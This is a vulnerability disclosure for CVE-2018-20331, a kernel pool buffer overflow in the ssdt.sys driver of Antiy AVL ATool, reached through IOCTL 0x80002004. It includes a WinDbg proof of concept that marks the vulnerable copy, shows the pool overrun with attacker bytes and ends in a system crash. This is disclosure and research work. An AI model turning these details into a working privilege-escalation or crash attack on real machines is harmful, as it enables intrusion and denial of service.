|
# Exploit Title: Kernel Pool Buffer Overflow ATool - 1.0.0.22 (0day)
# CVE: CVE-2018-20331
# Date: 21-12-2018
# Software Link: http://www.antiy.net/ <http://www.antiy.net/>
# Exploit Author: Aloyce J. Makalanga
# Contact: https://twitter.com/aloycemjr <https://twitter.com/aloycemjr>
# Vendor Homepage: http://www.antiy.net/ <http://www.antiy.net/>
# Category: Windows
# Attack Type: local
# Impact:Code execution/Denial of Service/Escalation of Privileges
1. Description
> Local attackers can trigger a Kernel Pool Buffer Overflow in
> Antiy AVL ATool
> v1.0.0.22. An attacker must first obtain the ability to execute
> low-privileged code on the target system in order to exploit this
> vulnerability. The specific flaw exists within the processing of IOCTL
> 0x80002004 by the ssdt.sys kernel driver. The bug is
> caused by failure to properly validate the length of the user-supplied
> data. An attacker can
> leverage this vulnerability to execute arbitrary code in the context
> of the kernel, which could lead to privilege escalation. A failed
> exploit could lead to denial of service.
2. Proof of Concept
0: kd> !drvobj ssdt 2
Driver object (87fe0f38) is for:
\Driver\ssdt
DriverEntry: aaa0b99e ssdt
DriverStartIo: 00000000
DriverUnload: aaa0b828 ssdt
AddDevice: 00000000
Dispatch routines:
[00] IRP_MJ_CREATE aaa0b686 ssdt+0x686
[01] IRP_MJ_CREATE_NAMED_PIPE 82b08da3 nt!IopInvalidDeviceRequest
[02] IRP_MJ_CLOSE aaa0b686 ssdt+0x686
[03] IRP_MJ_READ 82b08da3 nt!IopInvalidDeviceRequest
[04] IRP_MJ_WRITE 82b08da3 nt!IopInvalidDeviceRequest
[05] IRP_MJ_QUERY_INFORMATION 82b08da3 nt!IopInvalidDeviceRequest
[06] IRP_MJ_SET_INFORMATION 82b08da3 nt!IopInvalidDeviceRequest
[07] IRP_MJ_QUERY_EA 82b08da3 nt!IopInvalidDeviceRequest
[08] IRP_MJ_SET_EA 82b08da3 nt!IopInvalidDeviceRequest
[09] IRP_MJ_FLUSH_BUFFERS 82b08da3 nt!IopInvalidDeviceRequest
[0a] IRP_MJ_QUERY_VOLUME_INFORMATION 82b08da3 nt!IopInvalidDeviceRequest
[0b] IRP_MJ_SET_VOLUME_INFORMATION 82b08da3 nt!IopInvalidDeviceRequest
[0c] IRP_MJ_DIRECTORY_CONTROL 82b08da3 nt!IopInvalidDeviceRequest
[0d] IRP_MJ_FILE_SYSTEM_CONTROL 82b08da3 nt!IopInvalidDeviceRequest
[0e] IRP_MJ_DEVICE_CONTROL aaa0b6c8 ssdt+0x6c8 <======================= Dispatch Function
[0f] IRP_MJ_INTERNAL_DEVICE_CONTROL 82b08da3 nt!IopInvalidDeviceRequest
[10] IRP_MJ_SHUTDOWN 82b08da3 nt!IopInvalidDeviceRequest
[11] IRP_MJ_LOCK_CONTROL 82b08da3 nt!IopInvalidDeviceRequest
[12] IRP_MJ_CLEANUP 82b08da3 nt!IopInvalidDeviceRequest
[13] IRP_MJ_CREATE_MAILSLOT 82b08da3 nt!IopInvalidDeviceRequest
[14] IRP_MJ_QUERY_SECURITY 82b08da3 nt!IopInvalidDeviceRequest
[15] IRP_MJ_SET_SECURITY 82b08da3 nt!IopInvalidDeviceRequest
[16] IRP_MJ_POWER 82b08da3 nt!IopInvalidDeviceRequest
[17] IRP_MJ_SYSTEM_CONTROL 82b08da3 nt!IopInvalidDeviceRequest
[18] IRP_MJ_DEVICE_CHANGE 82b08da3 nt!IopInvalidDeviceRequest
[19] IRP_MJ_QUERY_QUOTA 82b08da3 nt!IopInvalidDeviceRequest
[1a] IRP_MJ_SET_QUOTA 82b08da3 nt!IopInvalidDeviceRequest
[1b] IRP_MJ_PNP 82b08da3 nt!IopInvalidDeviceRequest
0: kd> bp aaa0b6c8
0: kd> g
Breakpoint 0 hit
ssdt+0x6c8:
aaa0b6c8 8bff mov edi,edi
0: kd> dd edi
87d6d238 00800005 86c620c8 00000000 00000000
87d6d248 00000000 00000000 00000000 00000000
87d6d258 00000000 00000000 00000000 00040002
87d6d268 00000000 00000000 00000000 00000000
87d6d278 00000000 00000001 00000000 00040001
87d6d288 00000000 87d6d28c 87d6d28c 00040000
87d6d298 00000000 87d6d29c 87d6d29c 00000000
87d6d2a8 00000000 87d6d2ac 87d6d2ac 00000000
0: kd> u eip L20
ssdt+0x6c8:
aaa0b6c8 8bff mov edi,edi
aaa0b6ca 55 push ebp
aaa0b6cb 8bec mov ebp,esp
aaa0b6cd 83ec0c sub esp,0Ch
aaa0b6d0 53 push ebx
aaa0b6d1 8b5d0c mov ebx,dword ptr [ebp+0Ch]
aaa0b6d4 8b4360 mov eax,dword ptr [ebx+60h]
aaa0b6d7 56 push esi
aaa0b6d8 33f6 xor esi,esi
aaa0b6da 89731c mov dword ptr [ebx+1Ch],esi
aaa0b6dd 8b5004 mov edx,dword ptr [eax+4]
aaa0b6e0 8b4808 mov ecx,dword ptr [eax+8]
aaa0b6e3 8b400c mov eax,dword ptr [eax+0Ch]
aaa0b6e6 3d00200080 cmp eax,80002000h
aaa0b6eb 57 push edi
aaa0b6ec 8b7b0c mov edi,dword ptr [ebx+0Ch]
aaa0b6ef 8955fc mov dword ptr [ebp-4],edx
aaa0b6f2 0f84d7000000 je ssdt+0x7cf (aaa0b7cf)
aaa0b6f8 3d04200080 cmp eax,80002004h <======================== Vulnerable IOCTL
aaa0b6fd 7442 je ssdt+0x741 (aaa0b741)
aaa0b6ff 3d08200080 cmp eax,80002008h
aaa0b704 7531 jne ssdt+0x737 (aaa0b737)
aaa0b706 8b37 mov esi,dword ptr [edi]
aaa0b708 56 push esi
aaa0b709 68a4b6a0aa push offset ssdt+0x6a4 (aaa0b6a4)
aaa0b70e e873fdffff call ssdt+0x486 (aaa0b486)
aaa0b713 a10cb5a0aa mov eax,dword ptr [ssdt+0x50c (aaa0b50c)]
aaa0b718 3b7008 cmp esi,dword ptr [eax+8]
aaa0b71b 59 pop ecx
aaa0b71c 59 pop ecx
aaa0b71d 7714 ja ssdt+0x733 (aaa0b733)
aaa0b71f 8b00 mov eax,dword ptr [eax]
0: kd> u . L40
ssdt+0x6f8:
aaa0b6f8 3d04200080 cmp eax,80002004h
aaa0b6fd 7442 je ssdt+0x741 (aaa0b741)
aaa0b6ff 3d08200080 cmp eax,80002008h
aaa0b704 7531 jne ssdt+0x737 (aaa0b737)
aaa0b706 8b37 mov esi,dword ptr [edi]
aaa0b708 56 push esi
aaa0b709 68a4b6a0aa push offset ssdt+0x6a4 (aaa0b6a4)
aaa0b70e e873fdffff call ssdt+0x486 (aaa0b486)
aaa0b713 a10cb5a0aa mov eax,dword ptr [ssdt+0x50c (aaa0b50c)]
aaa0b718 3b7008 cmp esi,dword ptr [eax+8]
aaa0b71b 59 pop ecx
aaa0b71c 59 pop ecx
aaa0b71d 7714 ja ssdt+0x733 (aaa0b733)
aaa0b71f 8b00 mov eax,dword ptr [eax]
aaa0b721 8b04b0 mov eax,dword ptr [eax+esi*4]
aaa0b724 8907 mov dword ptr [edi],eax
aaa0b726 8b45fc mov eax,dword ptr [ebp-4]
aaa0b729 89431c mov dword ptr [ebx+1Ch],eax
aaa0b72c 33f6 xor esi,esi
aaa0b72e e9ad000000 jmp ssdt+0x7e0 (aaa0b7e0)
aaa0b733 83631c00 and dword ptr [ebx+1Ch],0
aaa0b737 be0d0000c0 mov esi,0C000000Dh
aaa0b73c e99f000000 jmp ssdt+0x7e0 (aaa0b7e0)
aaa0b741 6844646b20 push 206B6444h <======================= Pooltag
aaa0b746 c1e902 shr ecx,2
aaa0b749 52 push edx
aaa0b74a 8bf1 mov esi,ecx
aaa0b74c 6a00 push 0 <==================================Pool type
aaa0b74e
1: kd> u . L20
ssdt+0x782:
aaa0b782 8911 mov dword ptr [ecx],edx
aaa0b784 83c104 add ecx,4
aaa0b787 ff4df8 dec dword ptr [ebp-8]
aaa0b78a 75e5 jne ssdt+0x771 (aaa0b771)
aaa0b78c 8b75f4 mov esi,dword ptr [ebp-0Ch]
aaa0b78f 8b0d0cb5a0aa mov ecx,dword ptr [ssdt+0x50c (aaa0b50c)]
aaa0b795 3b7108 cmp esi,dword ptr [ecx+8]
aaa0b798 7316 jae ssdt+0x7b0 (aaa0b7b0)
aaa0b79a 8bd6 mov edx,esi
aaa0b79c 8b09 mov ecx,dword ptr [ecx]
aaa0b79e 8b0c91 mov ecx,dword ptr [ecx+edx*4]
aaa0b7a1 890c90 mov dword ptr [eax+edx*4],ecx
aaa0b7a4 8b0d0cb5a0aa mov ecx,dword ptr [ssdt+0x50c (aaa0b50c)]
aaa0b7aa 42 inc edx
aaa0b7ab 3b5108 cmp edx,dword ptr [ecx+8]
aaa0b7ae 72ec jb ssdt+0x79c (aaa0b79c)
aaa0b7b0 8b4dfc mov ecx,dword ptr [ebp-4]
aaa0b7b3 8bd1 mov edx,ecx
aaa0b7b5 c1e902 shr ecx,2
aaa0b7b8 8bf0 mov esi,eax
aaa0b7ba f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
aaa0b7bc 8bca mov ecx,edx
aaa0b7be 83e103 and ecx,3
aaa0b7c1 50 push eax
aaa0b7c2 f3a4 rep movs byte ptr es:[edi],byte ptr [esi] <======================= Vulnerable copy
1: kd> dc edi
85a6ce00 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA <================ Evil user input
85a6ce10 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
85a6ce20 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
85a6ce30 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
85a6ce40 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
85a6ce50 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
85a6ce60 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
85a6ce70 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
1: kd> g
*** Fatal System Error: 0x00000019
(0x00000020,0x892CF250,0x892CF260,0x08020012)
Break instruction exception - code 80000003 (first chance)
A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.
A fatal system error has occurred.
1: kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************
BAD_POOL_HEADER (19)
The pool is already corrupt at the time of the current request.
This may or may not be due to the caller.
The internal pool links must be walked to figure out a possible cause of
the problem, and then special pool applied to the suspect tags or the driver
verifier to a suspect driver.
Arguments:
Arg1: 00000020, a pool block header size is corrupt.
Arg2: 892cf250, The pool entry we were looking for within the page.
Arg3: 892cf260, The next pool entry.
Arg4: 08020012, (reserved
3. Solution:
None
|